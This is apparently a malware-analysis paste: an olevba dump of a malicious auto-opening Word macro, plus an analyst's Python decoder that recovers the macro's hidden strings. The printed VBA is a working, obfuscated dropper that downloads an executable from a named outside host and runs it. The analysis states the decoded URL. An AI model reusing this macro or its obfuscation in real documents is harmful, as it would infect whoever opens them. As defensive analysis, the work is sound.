Malicious Word macro

dynamoo Feb 27th, 2015
Flags       Filename                                                        
----------- -----------------------------------------------------------------
OLE:MAS---- inv650988.doc
 
(Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
 
===============================================================================
FILE: inv650988.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: inv650988.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
qK3M8Yvc
End Sub
 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: inv650988.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO fdgfdgfdg.bas
in file: inv650988.doc - OLE stream: u'Macros/VBA/fdgfdgfdg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
    Private Declare PtrSafe Function dfsdfsdffg Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
    ByVal gfhgfhF As String, _
    ByVal hjkhgFF As String, _
    ByVal gfhfghF As Long, _
    ByVal gfdgdf As LongPtr) As LongPtr
#Else
    Private Declare Function dfsdfsdffg Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
    ByVal gfhgfhF As String, _
    ByVal hjkhgFF As String, _
    ByVal gfhfghF As Long, _
    ByVal gfdgdf As Long) As Long
#End If
 
Sub qK3M8Yvc()
ZIoX79I wUnMnysKtQAKQMZpELN("hytit5pm:D/@/‚hle/w€.oh%o9m|e|pcacg4eD.\t.-To,nZl}i0n}ex.md,e&/Rj3sG/SbKibn‚.„eIxLe^"), Environ(wUnMnysKtQAKQMZpELN("T^M‚P|")) & wUnMnysKtQAKQMZpELN("\D3$294D2=3S5t2v3;5>.Pe~xYe.")
End Sub
Function ZIoX79I(D8PeV0 As String, j4B1GyX As String) As Boolean
vJHKBJdfkgfg = dfsdfsdffg(0&, D8PeV0, j4B1GyX, 0&, 0&)
uiLb = Shell(j4B1GyX, 1)
End Function
 
 
 
 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Shell              | May run an executable file or a system  |
|            |                    | command                                 |
| Suspicious | Environ            | May read system environment variables   |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
+------------+--------------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: inv650988.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
Public Function wUnMnysKtQAKQMZpELN(biBIyeZaYdOH As String) As String
GoTo kuddPCezMbIaLPpebUn
kuddPCezMbIaLPpebUn:
For tTFUZcTsUAkgUp = 1 To Len(biBIyeZaYdOH) Step 2
GoTo BHDOSh
BHDOSh:
GoTo NYRvLeyRLBhqqp
NYRvLeyRLBhqqp:
GoTo YfJVVl
YfJVVl:
GoTo kIYQAilFim
kIYQAilFim:
GoTo gtgSuQOrZqcgFgrl
gtgSuQOrZqcgFgrl:
wUnMnysKtQAKQMZpELN = wUnMnysKtQAKQMZpELN & Mid(biBIyeZaYdOH, tTFUZcTsUAkgUp, 1)
GoTo tRJGRjxSGPojLNuOTcRx
tRJGRjxSGPojLNuOTcRx:
GoTo FKhovanmCFIAZoh
FKhovanmCFIAZoh:
GoTo BVyDQNwJjjKS
BVyDQNwJjjKS:
GoTo bGfwQwHBTDaJUbQ
bGfwQwHBTDaJUbQ:
Next
GoTo VQhEzdeKRksiNIJHM
VQhEzdeKRksiNIJHM:
GoTo LcDCSILCcEkhPD
LcDCSILCcEkhPD:
GoTo FTeMMzzbjwYrQvMZN
FTeMMzzbjwYrQvMZN:
GoTo QTqalrnyPQmnxU
QTqalrnyPQmnxU:
End Function
 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
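olevba finds no IOC in Module2 because the decoder itself is benign: every GoTo in wUnMnysKtQAKQMZpELN jumps to the label on the very next line, so the only real work is the For loop, which walks the input with Step 2 and keeps characters 1, 3, 5, ... (1-based). The IOCs only appear once the three string literals in fdgfdgfdg are run through that loop, so the practical step is to re-implement the decoder and apply it statically, without ever executing the macro. The Python below is an added example, not part of the paste or of the macro; the three encoded literals are copied from the qK3M8Yvc sub above, the Environ("TMP") value is a constructed stand-in, and `extract_iocs` is a small helper of my own for pulling every decoder call out of an olevba dump. Applying the decoder to the page's own literals yields the download URL http://hew.homepage.t-online.de/js/bin.exe and the drop path %TMP%\324235235.exe, which ZIoX79I then hands to URLDownloadToFileA and Shell.

```python
"""
Static re-implementation of the macro's string decoder (Module2,
wUnMnysKtQAKQMZpELN).  Added example; not code from the original paste.

VBA: For i = 1 To Len(s) Step 2 : out = out & Mid(s, i, 1) : Next
keeps every other character, starting with the first.  The GoTo/label
pairs between those lines are no-ops inserted to defeat keyword scanners.
"""
import re

# The three literals exactly as they appear in Sub qK3M8Yvc() in the olevba
# output.  Raw strings are essential: the first one contains ".\t." which a
# normal Python literal would silently turn into a tab and break the decode.
ENCODED_URL = r"hytit5pm:D/@/‚hle/w€.oh%o9m|e|pcacg4eD.\t.-To,nZl}i0n}ex.md,e&/Rj3sG/SbKibn‚.„eIxLe^"
ENCODED_ENV_NAME = r"T^M‚P|"
ENCODED_FILENAME = r"\D3$294D2=3S5t2v3;5>.Pe~xYe."


def decode(s: str) -> str:
    """Equivalent of wUnMnysKtQAKQMZpELN: characters at 1-based odd positions."""
    # Python slice [::2] takes 0-based indices 0, 2, 4 ... == VBA Mid(s, 1/3/5 ...)
    return s[::2]


def recover_download(env=None):
    """Reproduce the (url, local_path) pair that ZIoX79I receives, without
    calling URLDownloadToFileA or Shell.  `env` stands in for Environ(); the
    default is a constructed value so nothing on the analyst's box is read."""
    if env is None:
        env = {"TMP": r"C:\Users\victim\AppData\Local\Temp"}  # constructed
    url = decode(ENCODED_URL)
    local_path = env[decode(ENCODED_ENV_NAME)] + decode(ENCODED_FILENAME)
    return url, local_path


# Matches each call to the decoder with a double-quoted literal argument.
_DECODER_CALL = re.compile(r'wUnMnysKtQAKQMZpELN\("([^"]*)"\)')


def extract_iocs(vba_source: str) -> list:
    """Find every wUnMnysKtQAKQMZpELN("...") in an olevba dump and decode it.
    Works on the raw text, so it can be pointed at the whole paste."""
    return [decode(literal) for literal in _DECODER_CALL.findall(vba_source)]


if __name__ == "__main__":
    url, path = recover_download()
    print("download URL:", url)
    print("dropped as  :", path)
```

Because `decode` works on the raw text of the dump rather than on the macro, the same helper can be pointed at a whole olevba output to list every decoded literal in one pass; if a future sample changes the Step value or starts at Mid(s, 2, 1), only the slice in `decode` needs adjusting.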